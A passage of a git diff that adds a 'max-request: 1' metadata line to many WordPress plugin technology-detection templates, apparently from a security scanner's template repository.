b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-law-info/ metadata: + max-request: 1 plugin_namespace: cookie-law-info wpscan: https://wpscan.com/plugin/cookie-law-info tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..41b5d6c854 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cookie-notice/ metadata: + max-request: 1 plugin_namespace: cookie-notice wpscan: https://wpscan.com/plugin/cookie-notice tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..cca31cc3a9 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creame-whatsapp-me/ metadata: + max-request: 1 plugin_namespace: creame-whatsapp-me wpscan: https://wpscan.com/plugin/creame-whatsapp-me tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..ff9c0a49ce 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/creative-mail-by-constant-contact/ metadata: + max-request: 1 plugin_namespace: creative-mail-by-constant-contact wpscan: https://wpscan.com/plugin/creative-mail-by-constant-contact tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..a76d3306bb 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-css-js/ metadata: + max-request: 1 plugin_namespace: custom-css-js wpscan: https://wpscan.com/plugin/custom-css-js tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..2249681b6d 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-fonts/ metadata: + max-request: 1 plugin_namespace: custom-fonts wpscan: https://wpscan.com/plugin/custom-fonts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..b5389b27c9 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/custom-post-type-ui/ metadata: + max-request: 1 plugin_namespace: custom-post-type-ui wpscan: https://wpscan.com/plugin/custom-post-type-ui tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..00d183f507 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-comments/ metadata: + max-request: 1 plugin_namespace: disable-comments wpscan: https://wpscan.com/plugin/disable-comments tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..451e1daef1 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/disable-gutenberg/ metadata: + max-request: 1 plugin_namespace: disable-gutenberg wpscan: https://wpscan.com/plugin/disable-gutenberg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..af30ca76b6 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-page/ metadata: + max-request: 1 plugin_namespace: duplicate-page wpscan: https://wpscan.com/plugin/duplicate-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..93823466d4 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicate-post/ metadata: + max-request: 1 plugin_namespace: duplicate-post wpscan: https://wpscan.com/plugin/duplicate-post tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..e224283ecd 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duplicator/ metadata: + max-request: 1 plugin_namespace: duplicator wpscan: https://wpscan.com/plugin/duplicator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..9af8df08a7 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/duracelltomi-google-tag-manager/ metadata: + max-request: 1 plugin_namespace: duracelltomi-google-tag-manager wpscan: https://wpscan.com/plugin/duracelltomi-google-tag-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..d4081474c3 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-fancybox/ metadata: + max-request: 1 plugin_namespace: easy-fancybox wpscan: https://wpscan.com/plugin/easy-fancybox tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..bcbc0707fb 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-table-of-contents/ metadata: + max-request: 1 plugin_namespace: easy-table-of-contents wpscan: https://wpscan.com/plugin/easy-table-of-contents tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..8b23832297 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/easy-wp-smtp/ metadata: + max-request: 1 plugin_namespace: easy-wp-smtp wpscan: https://wpscan.com/plugin/easy-wp-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..f0c3e4bc63 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementor/ metadata: + max-request: 1 plugin_namespace: elementor wpscan: https://wpscan.com/plugin/elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..eab4a0d725 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/elementskit-lite/ metadata: + max-request: 1 plugin_namespace: elementskit-lite wpscan: https://wpscan.com/plugin/elementskit-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..74c172ac94 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/enable-media-replace/ metadata: + max-request: 1 plugin_namespace: enable-media-replace wpscan: https://wpscan.com/plugin/enable-media-replace tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..f5a63a2ed2 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/envato-elements/ metadata: + max-request: 1 plugin_namespace: envato-elements wpscan: https://wpscan.com/plugin/envato-elements tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..25ca7328ef 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/essential-addons-for-elementor-lite/ metadata: + max-request: 1 plugin_namespace: essential-addons-for-elementor-lite wpscan: https://wpscan.com/plugin/essential-addons-for-elementor-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..cb1db5bee6 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ewww-image-optimizer/ metadata: + max-request: 1 plugin_namespace: ewww-image-optimizer wpscan: https://wpscan.com/plugin/ewww-image-optimizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..a3207ea16a 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/facebook-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: facebook-for-woocommerce wpscan: https://wpscan.com/plugin/facebook-for-woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..2a4b772078 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fast-indexing-api/ metadata: + max-request: 1 plugin_namespace: fast-indexing-api wpscan: https://wpscan.com/plugin/fast-indexing-api tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..366205085d 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/favicon-by-realfavicongenerator/ metadata: + max-request: 1 plugin_namespace: favicon-by-realfavicongenerator wpscan: https://wpscan.com/plugin/favicon-by-realfavicongenerator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..598f08ce88 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/flamingo/ metadata: + max-request: 1 plugin_namespace: flamingo wpscan: https://wpscan.com/plugin/flamingo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..42cdfb4475 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/fluentform/ metadata: + max-request: 1 plugin_namespace: fluentform wpscan: https://wpscan.com/plugin/fluentform tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..a1af263dbd 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/font-awesome/ metadata: + max-request: 1 plugin_namespace: font-awesome wpscan: https://wpscan.com/plugin/font-awesome tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..19265f910e 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/force-regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: force-regenerate-thumbnails wpscan: https://wpscan.com/plugin/force-regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 1e6a62e23b..c21d414695 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/formidable/ metadata: + max-request: 1 plugin_namespace: formidable wpscan: https://wpscan.com/plugin/formidable tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..91c89d0ad8 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/forminator/ metadata: + max-request: 1 plugin_namespace: forminator wpscan: https://wpscan.com/plugin/forminator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..539d9f7cec 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ga-google-analytics/ metadata: + max-request: 1 plugin_namespace: ga-google-analytics wpscan: https://wpscan.com/plugin/ga-google-analytics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..f4123bb594 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gdpr-cookie-compliance/ metadata: + max-request: 1 plugin_namespace: gdpr-cookie-compliance wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..254f916291 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/ metadata: + max-request: 1 plugin_namespace: google-analytics-dashboard-for-wp wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..8074ac337e 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-analytics-for-wordpress/ metadata: + max-request: 1 plugin_namespace: google-analytics-for-wordpress wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..b9de0ee313 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-listings-and-ads/ metadata: + max-request: 1 plugin_namespace: google-listings-and-ads wpscan: https://wpscan.com/plugin/google-listings-and-ads tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..7b0f188ff7 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-site-kit/ metadata: + max-request: 1 plugin_namespace: google-site-kit wpscan: https://wpscan.com/plugin/google-site-kit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..898e4de56d 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/google-sitemap-generator/ metadata: + max-request: 1 plugin_namespace: google-sitemap-generator wpscan: https://wpscan.com/plugin/google-sitemap-generator tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 22ee97b51f..4a76856a69 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gtranslate/ metadata: + max-request: 1 plugin_namespace: gtranslate wpscan: https://wpscan.com/plugin/gtranslate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 3f4c6c8936..b321ca63eb 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/gutenberg/ metadata: + max-request: 1 plugin_namespace: gutenberg wpscan: https://wpscan.com/plugin/gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index fa1bb64115..2b42c9f80c 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/happy-elementor-addons/ metadata: + max-request: 1 plugin_namespace: happy-elementor-addons wpscan: https://wpscan.com/plugin/happy-elementor-addons tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index da63d1cbf6..dbea07a6da 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-code-manager/ metadata: + max-request: 1 plugin_namespace: header-footer-code-manager wpscan: https://wpscan.com/plugin/header-footer-code-manager tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index f94e7f6494..17a8f220cf 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer-elementor/ metadata: + max-request: 1 plugin_namespace: header-footer-elementor wpscan: https://wpscan.com/plugin/header-footer-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 95d2aa5f16..956a08b32d 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/header-footer/ metadata: + max-request: 1 plugin_namespace: header-footer wpscan: https://wpscan.com/plugin/header-footer tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index af8193b875..5a570b9077 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/health-check/ metadata: + max-request: 1 plugin_namespace: health-check wpscan: https://wpscan.com/plugin/health-check tags: 